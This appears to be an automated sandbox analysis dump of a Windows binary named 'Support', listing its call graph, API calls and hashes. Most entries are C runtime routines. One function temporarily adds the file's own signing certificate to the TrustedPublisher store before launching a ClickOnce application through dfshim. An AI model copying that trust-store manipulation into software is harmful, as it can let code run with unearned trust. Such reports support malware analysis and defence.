calls 6555 615c4d 6553->6555 6554->6552 6555->6532 6556->6553 6560 61572a LeaveCriticalSection 6557->6560 6559 615d21 6559->6531 6560->6559 6561->6548 5845 612f53 5846 612f62 5845->5846 5847 612f7e 5845->5847 5846->5847 5849 612f68 5846->5849 5848 61522b 46 API calls 5847->5848 5850 612f85 GetModuleFileNameA 5848->5850 5851 6147f9 _free 15 API calls 5849->5851 5852 612fa9 5850->5852 5853 612f6d 5851->5853 5868 613077 5852->5868 5854 61473d _abort 21 API calls 5853->5854 5865 612f77 5854->5865 5859 612fe8 5861 613077 33 API calls 5859->5861 5860 612fdc 5862 6147f9 _free 15 API calls 5860->5862 5866 612ffe 5861->5866 5863 612fe1 5862->5863 5864 614869 _free 15 API calls 5863->5864 5864->5865 5866->5863 5867 614869 _free 15 API calls 5866->5867 5867->5863 5870 61309c 5868->5870 5869 6155b6 33 API calls 5869->5870 5870->5869 5872 6130fc 5870->5872 5871 612fc6 5874 6131ec 5871->5874 5872->5871 5873 6155b6 33 API calls 5872->5873 5873->5872 5875 612fd3 5874->5875 5876 613201 5874->5876 5875->5859 5875->5860 5876->5875 5877 61480c __dosmaperr 15 API calls 5876->5877 5878 61322f 5877->5878 5879 614869 _free 15 API calls 5878->5879 5879->5875 6672 616893 GetProcessHeap 6043 617419 6053 617fb2 6043->6053 6047 617426 6066 61828e 6047->6066 6050 617450 6051 614869 _free 15 API calls 6050->6051 6052 61745b 6051->6052 6070 617fbb 6053->6070 6055 617421 6056 6181ee 6055->6056 6057 6181fa ___scrt_is_nonwritable_in_current_image 6056->6057 6090 6156e2 EnterCriticalSection 6057->6090 6059 618270 6104 618285 6059->6104 6061 618205 6061->6059 6063 618244 DeleteCriticalSection 6061->6063 6091 61901c 6061->6091 6062 61827c _abort 6062->6047 6065 614869 _free 15 API calls 6063->6065 6065->6061 6067 6182a4 6066->6067 6068 617435 DeleteCriticalSection 6066->6068 6067->6068 6069 614869 _free 15 API calls 6067->6069 6068->6047 6068->6050 6069->6068 6071 617fc7 ___scrt_is_nonwritable_in_current_image 6070->6071 6080 6156e2 EnterCriticalSection 6071->6080 6073 61806a 6085 61808a 6073->6085 6076 618076 _abort 6076->6055 6078 617f6b 61 API calls 6079 617fd6 6078->6079 6079->6073 6079->6078 6081 617465 EnterCriticalSection 6079->6081 6082 618060 6079->6082 6080->6079 6081->6079 6088 617479 LeaveCriticalSection 6082->6088 6084 618068 6084->6079 6089 61572a LeaveCriticalSection 6085->6089 6087 618091 6087->6076 6088->6084 6089->6087 6090->6061 6092 619028 ___scrt_is_nonwritable_in_current_image 6091->6092 6093 619039 6092->6093 6094 61904e 6092->6094 6095 6147f9 _free 15 API calls 6093->6095 6103 619049 _abort 6094->6103 6107 617465 EnterCriticalSection 6094->6107 6097 61903e 6095->6097 6099 61473d _abort 21 API calls 6097->6099 6098 61906a 6108 618fa6 6098->6108 6099->6103 6101 619075 6124 619092 6101->6124 6103->6061 6362 61572a LeaveCriticalSection 6104->6362 6106 61828c 6106->6062 6107->6098 6109 618fb3 6108->6109 6110 618fc8 6108->6110 6111 6147f9 _free 15 API calls 6109->6111 6122 618fc3 6110->6122 6127 617f05 6110->6127 6113 618fb8 6111->6113 6115 61473d _abort 21 API calls 6113->6115 6115->6122 6116 61828e 15 API calls 6117 618fe4 6116->6117 6133 61732b 6117->6133 6119 618fea 6140 619d4e 6119->6140 6122->6101 6123 614869 _free 15 API calls 6123->6122 6361 617479 LeaveCriticalSection 6124->6361 6126 61909a 6126->6103 6128 617f19 6127->6128 6129 617f1d 6127->6129 6128->6116 6129->6128 6130 61732b 21 API calls 6129->6130 6131 617f3d 6130->6131 6155 6189a7 6131->6155 6134 617337 6133->6134 6135 61734c 6133->6135 6136 6147f9 _free 15 API calls 6134->6136 6135->6119 6137 61733c 6136->6137 6138 61473d _abort 21 API calls 6137->6138 6139 617347 6138->6139 6139->6119 6141 619d72 6140->6141 6142 619d5d 6140->6142 6143 619dad 6141->6143 6148 619d99 6141->6148 6144 6147e6 __dosmaperr 15 API calls 6142->6144 6146 6147e6 __dosmaperr 15 API calls 6143->6146 6145 619d62 6144->6145 6147 6147f9 _free 15 API calls 6145->6147 6149 619db2 6146->6149 6152 618ff0 6147->6152 6318 619d26 6148->6318 6151 6147f9 _free 15 API calls 6149->6151 6153 619dba 6151->6153 6152->6122 6152->6123 6154 61473d _abort 21 API calls 6153->6154 6154->6152 6156 6189b3 ___scrt_is_nonwritable_in_current_image 6155->6156 6157 6189d3 6156->6157 6158 6189bb 6156->6158 6160 618a71 6157->6160 6165 618a08 6157->6165 6180 6147e6 6158->6180 6162 6147e6 __dosmaperr 15 API calls 6160->6162 6164 618a76 6162->6164 6163 6147f9 _free 15 API calls 6166 6189c8 _abort 6163->6166 6167 6147f9 _free 15 API calls 6164->6167 6183 615d23 EnterCriticalSection 6165->6183 6166->6128 6169 618a7e 6167->6169 6171 61473d _abort 21 API calls 6169->6171 6170 618a0e 6172 618a2a 6170->6172 6173 618a3f 6170->6173 6171->6166 6174 6147f9 _free 15 API calls 6172->6174 6184 618a92 6173->6184 6176 618a2f 6174->6176 6178 6147e6 __dosmaperr 15 API calls 6176->6178 6177 618a3a 6233 618a69 6177->6233 6178->6177 6181 6144a8 __dosmaperr 15 API calls 6180->6181 6182 6147eb 6181->6182 6182->6163 6183->6170 6185 618ac0 6184->6185 6212 618ab9 _ValidateLocalCookies 6184->6212 6186 618ae3 6185->6186 6187 618ac4 6185->6187 6189 618b34 6186->6189 6190 618b17 6186->6190 6188 6147e6 __dosmaperr 15 API calls 6187->6188 6191 618ac9 6188->6191 6193 618b4a 6189->6193 6236 618f8b 6189->6236 6192 6147e6 __dosmaperr 15 API calls 6190->6192 6194 6147f9 _free 15 API calls 6191->6194 6195 618b1c 6192->6195 6239 618637 6193->6239 6197 618ad0 6194->6197 6199 6147f9 _free 15 API calls 6195->6199 6200 61473d _abort 21 API calls 6197->6200 6204 618b24 6199->6204 6200->6212 6202 618b91 6208 618ba5 6202->6208 6209 618beb WriteFile 6202->6209 6203 618b58 6205 618b5c 6203->6205 6206 618b7e 6203->6206 6207 61473d _abort 21 API calls 6204->6207 6210 618c52 6205->6210 6246 6185ca 6205->6246 6251 618417 GetConsoleCP 6206->6251 6207->6212 6214 618bdb 6208->6214 6215 618bad 6208->6215 6213 618c0e GetLastError 6209->6213 6218 618b74 6209->6218 6210->6212 6222 6147f9 _free 15 API calls 6210->6222 6212->6177 6213->6218 6271 6186ad 6214->6271 6219 618bb2 6215->6219 6220 618bcb 6215->6220 6218->6210 6218->6212 6224 618c2e 6218->6224 6219->6210 6260 61878c 6219->6260 6265 61887a 6220->6265 6223 618c77 6222->6223 6226 6147e6 __dosmaperr 15 API calls 6223->6226 6227 618c35 6224->6227 6228 618c49 6224->6228 6226->6212 6230 6147f9 _free 15 API calls 6227->6230 6276 6147c3 6228->6276 6231 618c3a 6230->6231 6232 6147e6 __dosmaperr 15 API calls 6231->6232 6232->6212 6317 615d46 LeaveCriticalSection 6233->6317 6235 618a6f 6235->6166 6281 618f0d 6236->6281 6303 617eaf 6239->6303 6241 61864c 6241->6202 6241->6203 6242 618647 6242->6241 6243 614424 _abort 33 API calls 6242->6243 6244 61866f 6243->6244 6244->6241 6245 61868d GetConsoleMode 6244->6245 6245->6241 6247 6185ef 6246->6247 6250 618624 6246->6250 6248 619101 WriteConsoleW CreateFileW 6247->6248 6249 618626 GetLastError 6247->6249 6247->6250 6248->6247 6249->6250 6250->6218 6252 61858c _ValidateLocalCookies 6251->6252 6254 61847a 6251->6254 6252->6218 6254->6252 6255 618500 WideCharToMultiByte 6254->6255 6257 6172b7 35 API calls __fassign 6254->6257 6259 618557 WriteFile 6254->6259 6312 616052 6254->6312 6255->6252 6256 618526 WriteFile 6255->6256 6256->6254 6258 6185af GetLastError 6256->6258 6257->6254 6258->6252 6259->6254 6259->6258 6262 61879b 6260->6262 6261 618819 WriteFile 6261->6262 6263 61885f GetLastError 6261->6263 6262->6261 6264 61885d _ValidateLocalCookies 6262->6264 6263->6264 6264->6218 6267 618889 6265->6267 6266 618994 _ValidateLocalCookies 6266->6218 6267->6266 6268 61890b WideCharToMultiByte 6267->6268 6269 618940 WriteFile 6267->6269 6268->6269 6270 61898c GetLastError 6268->6270 6269->6267 6269->6270 6270->6266 6273 6186bc 6271->6273 6272 61872e WriteFile 6272->6273 6274 618771 GetLastError 6272->6274 6273->6272 6275 61876f _ValidateLocalCookies 6273->6275 6274->6275 6275->6218 6277 6147e6 __dosmaperr 15 API calls 6276->6277 6278 6147ce _free 6277->6278 6279 6147f9 _free 15 API calls 6278->6279 6280 6147e1 6279->6280 6280->6212 6290 615dfa 6281->6290 6283 618f1f 6284 618f27 6283->6284 6285 618f38 SetFilePointerEx 6283->6285 6288 6147f9 _free 15 API calls 6284->6288 6286 618f50 GetLastError 6285->6286 6287 618f2c 6285->6287 6289 6147c3 __dosmaperr 15 API calls 6286->6289 6287->6193 6288->6287 6289->6287 6291 615e07 6290->6291 6292 615e1c 6290->6292 6293 6147e6 __dosmaperr 15 API calls 6291->6293 6294 6147e6 __dosmaperr 15 API calls 6292->6294 6296 615e41 6292->6296 6295 615e0c 6293->6295 6297 615e4c 6294->6297 6298 6147f9 _free 15 API calls 6295->6298 6296->6283 6299 6147f9 _free 15 API calls 6297->6299 6300 615e14 6298->6300 6301 615e54 6299->6301 6300->6283 6302 61473d _abort 21 API calls 6301->6302 6302->6300 6304 617ec9 6303->6304 6305 617ebc 6303->6305 6308 617ed5 6304->6308 6309 6147f9 _free 15 API calls 6304->6309 6306 6147f9 _free 15 API calls 6305->6306 6307 617ec1 6306->6307 6307->6242 6308->6242 6310 617ef6 6309->6310 6311 61473d _abort 21 API calls 6310->6311 6311->6307 6313 614424 _abort 33 API calls 6312->6313 6314 61605d 6313->6314 6315 6172d1 __fassign 33 API calls 6314->6315 6316 61606d 6315->6316 6316->6254 6317->6235 6321 619ca4 6318->6321 6320 619d4a 6320->6152 6322 619cb0 ___scrt_is_nonwritable_in_current_image 6321->6322 6332 615d23 EnterCriticalSection 6322->6332 6324 619cbe 6325 619cf0 6324->6325 6326 619ce5 6324->6326 6328 6147f9 _free 15 API calls 6325->6328 6333 619dcd 6326->6333 6329 619ceb 6328->6329 6348 619d1a 6329->6348 6331 619d0d _abort 6331->6320 6332->6324 6334 615dfa 21 API calls 6333->6334 6337 619ddd 6334->6337 6335 619de3 6351 615d69 6335->6351 6337->6335 6338 615dfa 21 API calls 6337->6338 6347 619e15 6337->6347 6341 619e0c 6338->6341 6339 615dfa 21 API calls 6342 619e21 CloseHandle 6339->6342 6344 615dfa 21 API calls 6341->6344 6342->6335 6345 619e2d GetLastError 6342->6345 6343 619e5d 6343->6329 6344->6347 6345->6335 6346 6147c3 __dosmaperr 15 API calls 6346->6343 6347->6335 6347->6339 6360 615d46 LeaveCriticalSection 6348->6360 6350 619d24 6350->6331 6352 615d78 6351->6352 6353 615ddf 6351->6353 6352->6353 6359 615da2 6352->6359 6354 6147f9 _free 15 API calls 6353->6354 6355 615de4 6354->6355 6356 6147e6 __dosmaperr 15 API calls 6355->6356 6357 615dcf 6356->6357 6357->6343 6357->6346 6358 615dc9 SetStdHandle 6358->6357 6359->6357 6359->6358 6360->6350 6361->6126 6362->6106 5880 61365d 5883 613e89 5880->5883 5884 613e95 _abort 5883->5884 5885 614424 _abort 33 API calls 5884->5885 5886 613e9a 5885->5886 5887 613f24 _abort 33 API calls 5886->5887 5888 613ec4 5887->5888 6363 617d1c 6364 61522b 46 API calls 6363->6364 6365 617d21 6364->6365

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000104), ref: 00611016
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00611025
                                                                                                                          • CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00611032
                                                                                                                          • LocalAlloc.KERNELBASE(00000000,00040000), ref: 00611057
                                                                                                                          • LocalAlloc.KERNEL32(00000000,00040000), ref: 00611063
                                                                                                                          • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00611082
                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 006110B2
                                                                                                                          • LocalAlloc.KERNEL32(00000000,?), ref: 006110C5
                                                                                                                          • LocalAlloc.KERNEL32(00000000,00002000), ref: 006110F4
                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 0061110A
                                                                                                                          • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 0061111A
                                                                                                                          • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 0061112D
                                                                                                                          • CertFreeCertificateContext.CRYPT32(00000000), ref: 00611134
                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 0061113E
                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 0061115D
                                                                                                                          • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 0061116E
                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00611182
                                                                                                                          • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00611198
                                                                                                                          • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 006111A9
                                                                                                                          • LoadLibraryA.KERNELBASE(dfshim), ref: 006111BA
                                                                                                                          • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 006111C6
                                                                                                                          • Sleep.KERNELBASE(00009C40), ref: 006111E8
                                                                                                                          • CertDeleteCertificateFromStore.CRYPT32(?), ref: 0061120B
                                                                                                                          • CertCloseStore.CRYPT32(?,00000000), ref: 0061121A
                                                                                                                          • LocalFree.KERNEL32(?), ref: 00611223
                                                                                                                          • LocalFree.KERNEL32(?), ref: 00611228
                                                                                                                          • LocalFree.KERNEL32(?), ref: 0061122D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                          • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                          • API String ID: 335784236-860318880
                                                                                                                          • Opcode ID: cf48df1105e6d21471b81b379187b0c64a72412ead0e5f2f8a53e5af2d88f4c1
                                                                                                                          • Instruction ID: 1d5a7afa10a10d0168fdb63e3bbae5fc5d2dca139ce18f54561fa3ebcbf64c93
                                                                                                                          • Opcode Fuzzy Hash: cf48df1105e6d21471b81b379187b0c64a72412ead0e5f2f8a53e5af2d88f4c1
                                                                                                                          • Instruction Fuzzy Hash: 5E618D71A00208BFEB119FA0DC45FEFBBB6EF48B51F095055F614BB290C7719A418BA4
                                                                                                                          APIs
                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0061192B
                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 006119F7
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00611A10
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00611A1A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 254469556-0
                                                                                                                          • Opcode ID: faabd057662aedbfc5b98c7f0e7ef5f0a545b08e03e425c8a8d96fbb8c7c4495
                                                                                                                          • Instruction ID: 04ac0776baeeeee1b6e8c3c4ddaafd74955ab16d3fe358ff54a474bf5d223d6e
                                                                                                                          • Opcode Fuzzy Hash: faabd057662aedbfc5b98c7f0e7ef5f0a545b08e03e425c8a8d96fbb8c7c4495
                                                                                                                          • Instruction Fuzzy Hash: 17312675D012289BDF20DFA4D949BCDBBB8AF08301F1481AAE50CAB250EB749AC5CF45
                                                                                                                          APIs
                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0061466B
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00614675
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00614682
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3906539128-0
                                                                                                                          • Opcode ID: a4effb3dc53844036fba21e6628509d72a4f5ba514759eacc1fbb64ba7916476
                                                                                                                          • Instruction ID: 298b3a4335079d3daa14c87ed2698dbdacfa902c36513874e681b264756faa12
                                                                                                                          • Opcode Fuzzy Hash: a4effb3dc53844036fba21e6628509d72a4f5ba514759eacc1fbb64ba7916476
                                                                                                                          • Instruction Fuzzy Hash: 9B31D3749012289BCB61DF64D988BCDBBB9BF08311F5451EAE41CA7250EB709BC58F45
                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,0061364D,?,006202E0,0000000C,006137A4,?,00000002,00000000,?,00613F66,00000003,0061209F,00611AFC), ref: 00613698
                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0061364D,?,006202E0,0000000C,006137A4,?,00000002,00000000,?,00613F66,00000003,0061209F,00611AFC), ref: 0061369F
                                                                                                                          • ExitProcess.KERNEL32 ref: 006136B1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1703294689-0
                                                                                                                          • Opcode ID: 58ff4a3db65dc9f263bd5127dc5d871362cda692fa08a8218396f7506ebab705
                                                                                                                          • Instruction ID: 22acf8e95cefab385da60d3c0484bfe26f913d4045b05a75475547836eec54ac
                                                                                                                          • Opcode Fuzzy Hash: 58ff4a3db65dc9f263bd5127dc5d871362cda692fa08a8218396f7506ebab705
                                                                                                                          • Instruction Fuzzy Hash: C0E04631000118EFCF11AF54DD09ACA3B6BEF48342B089018FA168A331DB35DE82CA94
                                                                                                                          APIs
                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0061A490,?,?,00000008,?,?,0061A130,00000000), ref: 0061A6C2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionRaise
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3997070919-0
                                                                                                                          • Opcode ID: 478a86e4ae8f531452efe7aa9bec1d5a43bb6021705252199c94a601b01ed18d
                                                                                                                          • Instruction ID: bad8bfdc2dd12469e9b85d49c236a1298a1d445f03f136628a3af22d73001984
                                                                                                                          • Opcode Fuzzy Hash: 478a86e4ae8f531452efe7aa9bec1d5a43bb6021705252199c94a601b01ed18d
                                                                                                                          • Instruction Fuzzy Hash: B9B16B752116089FD715CF68C48ABE47BE2FF44364F298658E89ACF3A1C335DA82CB41
                                                                                                                          APIs
                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00611BEA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2325560087-0
                                                                                                                          • Opcode ID: 5ca1040814c4de809017d556a5411d220aea3270b0ce249b319bace5dfe417d2
                                                                                                                          • Instruction ID: c32dd40a4781b2b1955ed897ef9069f5336187c077f84a4c24fe172527c54695
                                                                                                                          • Opcode Fuzzy Hash: 5ca1040814c4de809017d556a5411d220aea3270b0ce249b319bace5dfe417d2
                                                                                                                          • Instruction Fuzzy Hash: 41514971E146098BDB24CF65E8917EEBBF2FB59345F18902AC501EF364D3749981CB90
                                                                                                                          APIs
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00611300), ref: 00611AB1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3192549508-0
                                                                                                                          • Opcode ID: 4e93b2397badce915138a2cdfb370f411c0727482c7907e3c5f4d3a8c99bad1e
                                                                                                                          • Instruction ID: 5bed8a45c30135b9f8bfe91f097f53f20b64f55095ccd14c474c773ea1eab563
                                                                                                                          • Opcode Fuzzy Hash: 4e93b2397badce915138a2cdfb370f411c0727482c7907e3c5f4d3a8c99bad1e
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 54951025-0
                                                                                                                          • Opcode ID: 6c4c3abe1b560fa390c9c1ab7faf6577bbd44132777496344940c5ce966c8a49
                                                                                                                          • Instruction ID: 9ad2279126de35dc5612e397e562010215e9f29b4cc7134b762d521b494eca83
                                                                                                                          • Opcode Fuzzy Hash: 6c4c3abe1b560fa390c9c1ab7faf6577bbd44132777496344940c5ce966c8a49
                                                                                                                          • Instruction Fuzzy Hash: 55A01230200102AB53108F305A5A20835AA55005C070A60155104C0020D72040505A02

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 81 616507-61651b 82 616589-616591 81->82 83 61651d-616522 81->83 84 616593-616596 82->84 85 6165d8-6165f0 call 61667a 82->85 83->82 86 616524-616529 83->86 84->85 87 616598-6165d5 call 614869 * 4 84->87 93 6165f3-6165fa 85->93 86->82 89 61652b-61652e 86->89 87->85 89->82 92 616530-616538 89->92 94 616552-61655a 92->94 95 61653a-61653d 92->95 97 616619-61661d 93->97 98 6165fc-616600 93->98 100 616574-616588 call 614869 * 2 94->100 101 61655c-61655f 94->101 95->94 99 61653f-616551 call 614869 call 616078 95->99 108 616635-616641 97->108 109 61661f-616624 97->109 103 616602-616605 98->103 104 616616 98->104 99->94 100->82 101->100 106 616561-616573 call 614869 call 616176 101->106 103->104 112 616607-616615 call 614869 * 2 103->112 104->97 106->100 108->93 111 616643-616650 call 614869 108->111 116 616632 109->116 117 616626-616629 109->117 112->104 116->108 117->116 125 61662b-616631 call 614869 117->125 125->116
                                                                                                                          APIs
                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0061654B
                                                                                                                            • Part of subcall function 00616078: _free.LIBCMT ref: 00616095
                                                                                                                            • Part of subcall function 00616078: _free.LIBCMT ref: 006160A7
                                                                                                                            • Part of subcall function 00616078: _free.LIBCMT ref: 006160B9
                                                                                                                            • Part of subcall function 00616078: _free.LIBCMT ref: 006160CB
                                                                                                                            • Part of subcall function 00616078: _free.LIBCMT ref: 006160DD
                                                                                                                            • Part of subcall function 00616078: _free.LIBCMT ref: 006160EF
                                                                                                                            • Part of subcall function 00616078: _free.LIBCMT ref: 00616101
                                                                                                                            • Part of subcall function 00616078: _free.LIBCMT ref: 00616113
                                                                                                                            • Part of subcall function 00616078: _free.LIBCMT ref: 00616125
                                                                                                                            • Part of subcall function 00616078: _free.LIBCMT ref: 00616137
                                                                                                                            • Part of subcall function 00616078: _free.LIBCMT ref: 00616149
                                                                                                                            • Part of subcall function 00616078: _free.LIBCMT ref: 0061615B
                                                                                                                            • Part of subcall function 00616078: _free.LIBCMT ref: 0061616D
                                                                                                                          • _free.LIBCMT ref: 00616540
                                                                                                                            • Part of subcall function 00614869: HeapFree.KERNEL32(00000000,00000000,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?), ref: 0061487F
